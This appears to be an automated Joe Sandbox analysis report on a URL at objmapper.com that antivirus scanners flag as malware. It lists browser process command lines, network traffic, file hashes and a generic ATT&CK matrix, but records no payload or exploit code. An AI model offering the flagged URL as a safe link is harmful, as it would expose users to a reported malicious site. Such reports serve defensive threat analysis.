Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e

Overview

General Information

Sample URL:https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e
Analysis ID:1573530
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 5892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2032,i,3206080748019218094,3044205605287419375,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2eAvira URL Cloud: detection malicious, Label: malware
Source: https://objmapper.com/favicon.icoAvira URL Cloud: Label: malware
Source: https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2eHTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e HTTP/1.1Host: objmapper.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: objmapper.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2eAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: objmapper.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 07:12:01 GMTContent-Type: text/htmlContent-Length: 548Connection: close
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: classification engineClassification label: mal56.win@16/8@4/4
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2032,i,3206080748019218094,3044205605287419375,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2032,i,3206080748019218094,3044205605287419375,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://objmapper.com/favicon.ico100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
objmapper.com
185.121.15.137
truefalse
    high
    www.google.com
    142.250.181.132
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2etrue
        unknown
        https://objmapper.com/favicon.icofalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        185.121.15.137
        objmapper.comSpain
        207046REDSERVICIOESfalse
        142.250.181.132
        www.google.comUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.5
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1573530
        Start date and time:2024-12-12 08:10:59 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 4s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:browseurl.jbs
        Sample URL:https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal56.win@16/8@4/4
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.78, 64.233.163.84, 199.232.214.172, 192.229.221.95, 172.217.17.46, 172.217.17.35, 184.28.90.27, 20.12.23.50, 13.107.246.63
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 06:11:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2677
        Entropy (8bit):3.9746833238223274
        Encrypted:false
        SSDEEP:48:8Qld9Tl1xHQsZidAKZdA19ehwiZUklqeh9y+3:8QlH/ey
        MD5:F155699353F3C48083CE77C5A7A8F763
        SHA1:813C595E1993F491E8AF9747F4C8BDB15D55E76F
        SHA-256:D391C05F727543A4A04AC342D0DEFAB14C8DD53CC5A8BB9F52B592E0E9EEA359
        SHA-512:007E0EC6C4395C1C8A4A4FE0A9A59B24A0576E3516D6B4E8A23F50212E2E15C65F3BA612D5C40B23F97018B2B305933945456167A13B2AC69AC0D892C3E62748
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,........eL..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yz9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yz9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yz9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yz9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y|9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............l_2.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 06:11:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2679
        Entropy (8bit):3.989474358575088
        Encrypted:false
        SSDEEP:48:8Old9Tl1xHQsZidAKZdA1weh/iZUkAQkqehOy+2:8OlHF9Qry
        MD5:AA69EB1ED820842792A4F18041A604E3
        SHA1:25B9D58E97C3535EA19AE89AF28641C3C4512B4F
        SHA-256:39358B8E56AFBEF6508FB15B406B9E0F0156A6858FD3FF5E5744451DED2DB5E8
        SHA-512:2432092808344C3E693DB56E49BF10FFF058D13F4F179846DA40D16481FEBDFA2C92CA189531DF3AC7F89925C15ADB7E20C44E9CC99AB9ED0E46198134255092
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,.....I..eL..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yz9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yz9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yz9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yz9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y|9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............l_2.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2693
        Entropy (8bit):4.003156469538159
        Encrypted:false
        SSDEEP:48:8xuld9Tl1sHQsZidAKZdA14tseh7sFiZUkmgqeh7ssy+BX:8xulHSnKy
        MD5:48499FC2031D9829772A64A745414359
        SHA1:273B585E03CFFA577A4C2E3EB5104B050EDBF6E0
        SHA-256:8EB6EFFF58B98B81739D120294A73EDF437F846620D1C94FD0FED7E0A3EEBC7F
        SHA-512:E54E69D18B0C7D5ACAC1C124B4D24E7A9D0F26A3CFCA757EA9EE2A4CFF2C4EC851078E81E21C0C470A9C91CF2B2BA6B0A06DA55EB29054323D92A8EAE855691E
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yz9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yz9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yz9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yz9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............l_2.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 06:11:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2681
        Entropy (8bit):3.986730253892512
        Encrypted:false
        SSDEEP:48:8fld9Tl1xHQsZidAKZdA1vehDiZUkwqehiy+R:8flHGky
        MD5:188195EA3FF32BA57F49395133FFAC8E
        SHA1:34A2694BF43162D9E4817095685C3C582342EB91
        SHA-256:CC1A3DE83F40EFAB83F2398A29E98735DDE8DC8C5A9199BE6C82D1FDC116658D
        SHA-512:063D9CF68BB62777CFB7B2699E7340D36ADCDD0A35F4F3BCA05F3B419F6A43FB5EECBD7E34353B7E3FE1CA5E7C325A9016BFDC31C6EF83B0A91D1A29D464BFB3
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,....a...eL..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yz9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yz9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yz9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yz9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y|9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............l_2.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 06:11:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2681
        Entropy (8bit):3.9775264099345247
        Encrypted:false
        SSDEEP:48:8+ld9Tl1xHQsZidAKZdA1hehBiZUk1W1qehYy+C:8+lHG94y
        MD5:058080A9300BADE71C9315E2DA6352D6
        SHA1:6DA47E2E92713F50B7E7245FCDAA2D0CCED19CBD
        SHA-256:E25F35A4997C71B94522D1816AFF7C3126791206B5254825316F43BC6E93E2A2
        SHA-512:4E7EC88F31AF0A6F9635E02E6E0F53556BACF0865B589A2BFC07E7803EE1F9C5A1FD465F95F3D076A232129387564A7DA0B14C8093B8BE440A36663F2D8A8815
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,....)...eL..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yz9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yz9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yz9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yz9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y|9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............l_2.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 06:11:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2683
        Entropy (8bit):3.9876001948117277
        Encrypted:false
        SSDEEP:48:8Zld9Tl1xHQsZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbKy+yT+:8ZlHYT/TbxWOvTbKy7T
        MD5:59F87D3070E51BB328590F2F6337EFEE
        SHA1:7D661C9BDE9E5A3900BD0D73C204B7C56B3B00F1
        SHA-256:8D8A94CBAA8C496DB6896097DD5D789E7D126DBE2B5B3B0BCE595669BF4185D2
        SHA-512:DC0C0032616078185F39D277A2E5A6ADAEF4CC279B6995CE7456B709BEF568C84E6BDBB46622F20FE7109FBB5D97EB22EDFCC584D68F19F3AF08EDEC88D0A6EF
        Malicious:false
        Reputation:low
        Preview:L..................F.@.. ...$+.,........eL..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yz9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yz9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yz9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yz9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y|9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............l_2.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):548
        Entropy (8bit):4.688532577858027
        Encrypted:false
        SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
        MD5:370E16C3B7DBA286CFF055F93B9A94D8
        SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
        SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
        SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
        Malicious:false
        Reputation:low
        URL:https://objmapper.com/favicon.ico
        Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
        No static file info
        TimestampSource PortDest PortSource IPDest IP
        Dec 12, 2024 08:11:44.982625008 CET49675443192.168.2.523.1.237.91
        Dec 12, 2024 08:11:44.982731104 CET49674443192.168.2.523.1.237.91
